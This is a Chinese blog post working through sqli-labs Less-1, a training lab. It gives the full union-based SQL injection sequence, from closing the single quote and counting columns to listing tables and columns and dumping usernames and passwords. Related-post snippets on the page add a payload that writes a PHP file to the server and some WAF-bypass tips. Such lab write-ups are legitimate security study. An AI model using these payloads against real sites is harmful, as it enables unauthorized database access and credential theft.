#sqli-labs#Less-1

最新推荐文章于 2024-07-25 19:06:13 发布
最新推荐文章于 2024-07-25 19:06:13 发布
阅读量155 收藏
点赞数
分类专栏: 网安学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43476037/article/details/100107374
版权

总目录:戳一戳

Less-1:GET - Error based - Single quotes -String

  • 首先尝试?id=1',发现报错信息多了单引号
    在这里插入图片描述
  • 利用单引号闭合?id=1'and'1=1,注入成功
    在这里插入图片描述
  • 常规流程:猜字段?id=1'order by 3%23,可以看到当字段为3时,回显正常

%23 是#url编码之后的值,因为sql语句在进入数据查询的时候会进行一次url解码,所以这个地方必须是url编码之后的值

在这里插入图片描述

  • 而当id=4时,报错,说明字段数为3
    在这里插入图片描述
  • 爆字段位置?id=111'union select 1,2,3%23
    在这里插入图片描述
  • 爆库?id='union select 1,2,database()%23得到库名:security
    在这里插入图片描述
  • 爆表?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23,题目要求id,应该是users,用户数据表
    在这里插入图片描述
  • 爆列?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23
    在这里插入图片描述
  • 爆数据?id=' union select 1,2,group_concat(username,0x3a,password) from users%23

0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的’:’ ,用以分割pasword和username。

在这里插入图片描述

vircorns
关注
专栏目录
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1967
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Bypass学习基础
KHOST的博客
10-01 2392
一、网站防护分类 1.源码防护: 使用过滤函数对恶意攻击进行过滤,绕过思路: ①大小写替换 ②变换提交方式:如get请求变post/cookie请求绕过 ③编码绕过:url编码、基于语句重叠、注释符等 2.软件WAF: 通过访问速度、指纹识别等特征进行拦截;常见软件WAF如安全狗、D盾、云锁、云盾等,软件WAF侧重拦截web漏洞。通过访问阈值的大小判断为CC攻击,进行IP封锁; 3.硬件WAF: 主要防御流量和部分web攻击。常见硬件WAF如天融信、深信服等厂商的防火墙。硬件WAF基于T..
sqli lab page1-lesson1[GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)]
m0_68980215的博客
06-28 180
sqlilab,page1-lesson1
Mituan Less-1
weixin_45728648的博客
08-13 219
第一关: 点击后出现以下界面: 如未出现Your Login name: You Password: 则在网址中app.后加入 mituan.zone/Less-1/?id=1 推荐HackBar插件可以更加直观的编写代码执行 试一下参数 输入' 发现无返回数据说明‘进入了select查询语句(发现注入点) 利用 order by 语句排列发现排列4列时报错得出只有3列 1' order by 3%23 注:在...
SQLI -LABS靶场练习1-10
qq_45314073的博客
10-11 1953
LESS1: 1.判断是否动态网站 根据输入内容,返回不同的页面,如果是,则为动态网站,例如这里我们输入id=1与id=2返回不同的页面 2.找潜在注入点 搜索框或URL尾端加 ' 如果报错则可能存在sql注入漏洞 3.猜测后台SQL语句 select * from t_xx where xid=1…… 4.判断是数字型还是字符型 Less-1/?id=2-1 //发现与输入id=2的页面相同,也就是并没有进行运算,初步判断为字符型 注:?是否能用+判断 //不能,在浏览器里加号会.
SQL注入--报错注入
liukenn的博客
07-30 3343
一个带get参数的网站并且不从数据库返回数据,但存在报错信息 http://127.0.0.1/index.php?id=1 http://127.0.0.1/index.php?id=1' 查看字段情况: http://127.0.0.1/index.php?id=1' order by 3%23 http://127.0.0.1/index.php?id=1'
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 15万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-labs Less8-Less16
beiweixiaotian66的博客
07-23 723
一丢丢小练习
Sqli-labs Less32-Less33 宽字节注入
最新发布
beiweixiaotian66的博客
07-25 672
一丢丢Sqli-labs小练习
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1485
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 771
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 769
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
order by 排序原则
zhoumimi_comeon123的博客
09-09 6029
order by 排序原则 order by 默认不是根据拼音排序的 ,是根据ascii码排序的 如果按照拼音排序的话这边“大”应该是num=4中最大的,由此可以看到order by 是靠ascii码排序的。 所以一般是数字->字母->中文 按拼音排序 ORDER BY nlssort(name,'NLSSORT=SCHINESE_PINYIN_M') 但是当u...
#ctf解题姿势#一些绕过方法
vircorns的博客
08-12 2413
绕过WAF的方法 大小写混合 小写或大写的关键字匹配技术,正则表达式/express/i 大小写敏感即无法绕过 替换关键字 大小写转化无法绕过,而且正则表达式会替换或删除select、union这些关键字,如果只匹配一次就很容易绕过 举例:?id=-15 UNIunionON SELselectECT 1,2,3,4 使用编码 URL编码 ,存在一种情况URL编码只进行了一次过滤,可以用...
#ctf解题姿势#http协议
vircorns的博客
08-12 1303
小结指路 Method GET 参数数据跟在地址栏以后,以?开头,用&分割 明文传输,不适合提交敏感密码 四舍五入 bugku简单题目GET POST Hackbar或者cmd后curl -v URL -X POST -d post=flag 提交参数数据没有限制 bugku简单题目POST XCTF简单题目 HEAD PUT DELETE TRACE CONNECT O...
#五#RedTiger's Hackit的wp
vircorns的博客
08-10 571
做题链接:http://redtiger.labs.overthewire.org/ 关于知识点整理 https://blog.csdn.net/weixin_43476037/article/details/87464475 wp level 1 表名已知:level1_users,点开Category发现注入点cat 构造?cat=1 union select 1,2,username,p...
#ctf解题姿势#目录
vircorns的博客
06-16 337
一边做题一边更新,尽量把自己做过的题都能归类, 菜鸡持续更新 解题姿势 web方面 HTTP协议 小结指路 Method GET 参数数据跟在地址栏以后,以?开头,用&分割 明文传输,不适合提交敏感密码 四舍五入 bugku简单题目GET POST Hackbar或者cmd后curl -v URL -X POST -d post=flag 提交参数数据没有限制 bugku...
#笔记(四)#BurpSuite基础介绍(上)
vircorns的博客
01-22 265
1.Burp Tatget (1)Target Scope 作用 限制站点地图和Proxy历史中的显示结果 告诉Burp Proxy拦截哪些请求 Burp Spider抓取哪些内容 Burp Scanner自动扫描哪些作用域的安全漏洞 在Burp Intruder和Burp Repeater 中指定URL 包含两部分功能:允许规则和去除规则 (2)站点地图Site Map 包括访问的u...
sqli-labs-less1
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值